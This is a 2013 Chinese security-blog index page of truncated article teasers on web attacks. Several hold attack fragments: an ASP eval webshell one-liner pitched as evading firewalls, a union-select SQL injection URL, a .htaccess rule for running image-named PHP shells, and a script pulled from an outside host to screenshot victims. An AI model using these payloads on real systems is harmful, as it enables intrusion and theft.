admin 12年前 (2013-08-24) 1947浏览 0评论

它们游离在法律边缘，但影响着普通用户的网络环境，甚至参与制定地上规则 阑夕 2013-04-09 07:05 前阿里巴巴集团高级安全专家 @aullik5 曾在其微信公众帐号“道哥的黑板报”上分享了一则关于“黑客”的故事，文章颇具传奇小说的风格，不少...

admin 12年前 (2013-08-24) 6179浏览 1评论

貌似很多朋友拿着库，用BAT 或者PHP读取TXT的形式来扫，文件太大了的话，1，2分钟估计都查不出来，因为导入库是一个不错的方法，很多都不知道怎么搭建的吧，用MSSQL或则 ORACLE来搭建的，个人感觉没那必要，原因在于安装他们需要的空间很大，运...

admin 12年前 (2013-08-24) 2637浏览 1评论

先看一个注入点： http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,...

admin 12年前 (2013-08-24) 2237浏览 1评论

最近乌云社区里有位童鞋发了一个帖子： 说一个域名不知道用了什么手法居然绑定了李毅吧的url，既不是301重定向，也不是域名跳转，也不是域名转发。访问 www.liyiba.com 这个域名感觉李毅吧仿佛单独成立了一个网站一样！而且这个域名的权重居然涨...

admin 12年前 (2013-08-24) 1481浏览 0评论

用反射，比如想知道函数hello是哪个文件里的哪行定义的： 1 2 3 $obj = new ReflectionFunction("hello"); $file = $obj->getFileName(); $line =...

admin 12年前 (2013-08-24) 1522浏览 0评论

ps:这篇文章是《支付漏洞的三种常见类型》（http://jinglingshu.org/?p=1804）的一个案例，符合第二种情况：即没有对购买数量进行限制，导致可以将数量修改为负值。   1、首先进入商城，购买任意商品，提交商品数量时抓...

admin 12年前 (2013-08-24) 1686浏览 0评论

这个漏洞在酷狗旗下的繁星网： fanxing.kugou.com 情景再现：     情况分析： 繁星网相册处因为对上传的文件名没有做很好的过滤，我们只要开启抓包软件 看到提交的数据是： ——...

admin 12年前 (2013-08-23) 2689浏览 0评论

在使用xml-rpc的时候，server端获取client数据，主要是通过php输入流input，而不是$_POST数组。所以，这里主要探讨php输入流php://input。 下面的例子摘取的是wordpress中的一段代码，里面有用到http:...

admin 12年前 (2013-08-23) 1833浏览 0评论

1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = ‘c:\ddd.bak’;– 2.创建表并插曲入数据 create table [dbo].[dtest] ([cm...

admin 12年前 (2013-08-23) 3060浏览 0评论

几个变性的asp–过防火墙 过狗效果都不错 1 <%Y=request("x")%> <%execute(Y)%> 1 <%eval (eval(chr(114)+chr(101)+c...

admin 12年前 (2013-08-22) 9277浏览 0评论

PHP LFI读php文件源码以及直接post webshell 2013-08-17 15:25:15|  分类： 安全 |字号 订阅 最近在忙defcon的题目集训 其中有一套题目里 有个老外写的writeup中提到了LFI的另一种...

admin 12年前 (2013-08-22) 2150浏览 0评论

较老的漏洞了，今儿扒拉出来晒晒吧：) 以下内容来至：大风 今天要讲的这个漏洞是一个非常猥琐的漏洞。 大部分网站都有这个漏洞，不光是百度。 什么是xsio xsio是因为没有限制图片的position属性为absolute，导致可以控制一张图片出现在网...

admin 12年前 (2013-08-21) 2067浏览 0评论

Backtrack 已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB，可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令： 1 # cd /pentest/expl...

admin 12年前 (2013-08-21) 2102浏览 2评论

直到最近为止，对拥有数之不尽的独立地址的互联网进行整体扫描还是一种非常缓慢而“劳动密集型”的过程。举例来说，有人曾使用nmap进行过一次扫描，想要搜集有关加密技术在线使用量的数据。其结果是，这一过程足足花了两三个月时间。 密歇根大学研究人员觉得，他...

admin 12年前 (2013-08-20) 2392浏览 0评论

2个月前，长短短（Sogili）在群里发了一个html2canvas.js  并给了一个POC 我写了一个完整的js来获得对方的屏幕截图 看代码 document.write("<script src=\"http:\/\/xj.hk\/h...

admin 12年前 (2013-08-20) 1690浏览 0评论

很久很久以前剑心大叔叫我写过这样一篇文章，当时还没放假，就没去搭理他，嘿嘿。最近，小E又来找我写关于支付漏洞的文章，好吧，写就写了，趁暑假还有一点余额，就写这篇文章和大家来谈谈支付漏洞。(写得不好,大牛勿怪) ———- 根据乌云上的案例，支付漏洞一般...

admin 12年前 (2013-08-20) 2732浏览 1评论

这几天看了下htaccess的一些东东。首先环境要支持.htaccess，apache啥的。 php的.htaccess 第一种，添加扩展 AddType   application/x-httpd-php     .jpg 把shell扩展名修改为...

admin 12年前 (2013-08-20) 1888浏览 1评论

author:0x007er email:0x007er@gmail.com 说明：本文乃原创，同时也很菜 只是分享出自己一些想法 如有雷同 纯属科学现象 其实是这样的，我们平时经常看到一些漏洞扫描网站，诸如360网站安全检测 ScanV网站安全...

admin 12年前 (2013-08-20) 2362浏览 1评论

最近几年，各种对网站安全防护的免费产品风起云涌，单机版的就算安全狗，在线的就多了安全宝啊，360网站卫士啊，云盾啊，DNSPOD都集成宝宝了，搞得很多黑客的菜刀连接不上，于是各种大法出来了。 这几天看了些文章，做个整理。 第一种，各种分号 /;.sh...

admin 12年前 (2013-08-19) 1461浏览 0评论

Linux文件系统十问 –关于文件系统，你知道吗？ 作者：yanfei，腾讯后台架构师,参与项目为搜搜网页开发和搜搜开放平台。关于文件系统，相信大家都不陌生。身为攻城狮的我们几乎天天都会与之打交道，但是细深剖一下，其中又有多少是我们理...